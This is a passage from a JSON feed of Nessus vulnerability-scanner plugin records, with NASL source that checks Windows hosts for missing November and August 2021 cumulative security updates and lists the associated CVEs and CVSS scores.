rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:59:47", "description": "The remote Windows host is missing security update. See Vendor Advisory for KB5007205", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007205: Windows 2022 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007205.NASL", "href": "https://www.tenable.com/plugins/nessus/154994", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154994);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007205\");\n script_xref(name:\"MSFT\", value:\"MS21-5007205\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007205: Windows 2022 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update. See\nVendor Advisory for KB5007205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007205\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007205.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007205');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007205])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:59:47", "description": "The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007206.NASL", "href": "https://www.tenable.com/plugins/nessus/154993", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154993);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007206\");\n script_xref(name:\"MSFT\", value:\"MS21-5007206\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007206\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007206.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007206');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007206])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:50", "description": "The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 